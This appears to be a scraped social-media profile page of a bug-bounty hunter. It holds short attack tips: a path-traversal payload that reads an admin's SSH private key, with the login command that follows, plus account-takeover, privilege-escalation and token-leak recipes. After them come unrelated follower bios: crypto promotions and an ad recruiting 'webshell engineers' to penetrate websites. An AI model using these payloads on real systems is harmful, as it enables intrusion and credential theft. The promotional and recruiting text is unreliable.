Hunting for bugs & exploring the depths of OSINT! Passionate about cybersecurity, finding vulnerabilities, and unraveling digital footprints. #BugBounty #OSINTJoined June 2023
Getting the maximum impact :
read the SSH PRIVATE KEY:
aCSHELL/../../../../../../../home/admin/.ssh/id_rsa
connect to the server :
ssh [email protected] -i id_rsa
Getting the maximum impact :
read the SSH PRIVATE KEY:
aCSHELL/../../../../../../../home/admin/.ssh/id_rsa
connect to the server :
ssh [email protected] -i id_rsa https://t.co/uc0HML5nrD
Recent Bug (Story time) 🐞
Discovered via "?continue=https://privatecompany" that redirects to app.privatecompany and sends the access_token to privatecompany/?access=token.
1/n
#bugbounty#bugbountytip #bugbountytips
@intigriti Ok Let's learn something new today. while everyone talks about cache poisoning, xss, and any other vulnerability known, by almost everyone hunting. Let's exclude you from the rat-race hunting with a few tips.
There is a massive clue given by this output, and what is that ? The…
Update:
they replied, we use a third-party vendor for this msg'ing function so nothing we can do on our side. I agreed with them, because they cleared mention in their policy.
by the away i have learned a new bug type.
#BugBounty#Hackingtime
Update:
they replied, we use a third-party vendor for this msg'ing function so nothing we can do on our side. I agreed with them, because they cleared mention in their policy.
by the away i have learned a new bug type.
#BugBounty#Hackingtime
IDOR + ATO Account Takeover via Reset Password
- a logged in area;
- intercept password change request;
- change username to another;
- if u have successfully changed user pass, u have an IDOR + ATO;
Impact: Critical
credit @adrielsec#bugbounty#bugbountytips
Privilege Escalation 😈
PoC & Tips 😎:
Owner invite attacker to the org 💌
Attacker save the request when they still in the org 💾
Owner kick the attacker 🦵
Attacker send the request that they saved before 📩
credit: @frozzipies#bugbounty#bugbountytips
Many people have often asked me how to search for "ivanti" for shodan 😊 you can search as title: "Ivanti Connect" hostname: "target.*"
credit: @ynsmroztas#bugbountytip #bugbounty
yay started to try for my first bug tonight - it was a success (I think)
Problem I have is idk how to word it to report it correctly. Is there anyone who can assist 🧑🏽💻
#BugBounty
'All-In-One Regex' by @h4x0r_dz for searching leaked keys and secrets is a must-have. Here is how I was able to find a P1 recently using BurpSuite, The leaked secrets allowed me to see some employee related juicy info. Link: gist.github.com/h4x0r-dz/be69c…#BugBounty
4 Followers 170 FollowingRecruiting webshell engineers to penetrate websites, with a monthly salary of up to $100,000. If interested, please contact https://t.co/rPEJDct0fp
522 Followers 2K FollowingEvery step brings you closer to your goal. Don't let difficulties defeat you. Move forward bravely and success is just around the corner.✨
53 Followers 3K FollowingCrowdfunding Marketing Expert | Turning Ideas into Funded Success | Mastering the Art of Online Campaigns | Helping Entrepreneurs Go from Zero to Hero.
45 Followers 632 FollowingSeptember 18, 2023 tragedy struck the Yepez-Casucci family. Cesar was involved in a potentially fatal semi-truck accident on rt28 in the evening hours.
960K Followers 5K FollowingCNBC Crypto Trader , Founder Crypto Banter. Invest in protocols that will change the world-give them enough time to do their thing. Tweets not financial advice.
1K Followers 957 FollowingA Pussy Grabber is President - The world’s a joke, Let's try to laugh our way through it. We can kill each other or just grab some $PUSSY
https://t.co/nAG3MgTOXe
85K Followers 105 FollowingTokenising farts with the help of bots. Fartcoin dev orphaned it, we adopted $Fartcoin as CTO. No cabal, Fart freely!💨💨💨 Telegram: https://t.co/i45xJXboQF
41K Followers 187 Following$BERT - Mayor of Solana & Dogs Worldwide
Community-powered with a mission to help all dogs 🐶 🌍
Powering up @woofhub 🐾
TG: https://t.co/VXXlS9whnn
709K Followers 78 FollowingCommunity, Utility, Charity.
Crypto's first ever CTO.
On a mission to become the world's most known and used crypto.
Official TG: https://t.co/vBZd3lbFQK
20K Followers 290 FollowingShitcoin maxi. Early investor in $shib #shib
Tweets aren't financial advice. $btc $eth #altcoin
Back up account for @jammapelson1
151K Followers 1K Followingexperienced altcoin and shitcoin connoisseur | survivor of 3 bear markets | trader for @CCOLLECTIV3 | tweets are not financial advice
264K Followers 4K FollowingFull-time ape since 2016. Shitcoin maxi🦄
3x bear market survivor🐻
More 100x calls than I can count🔮
Sniper of leverage scalps🎯
I dont see X DMs, TG pinned📌
186K Followers 11 FollowingWhale Watch by @mobyagent allows you to track what the best whales are trading in real-time. $MOBY CA: Cy1GS2FqefgaMbi45UunrUzin1rfEmTUYnomddzBpump
4K Followers 4K FollowingMake Sure to build an Aeon and support as PFP
https://t.co/MUGVUYlRxR
#SPX6900
https://t.co/D9H0Ofd8PR
https://t.co/mU7hLitY9W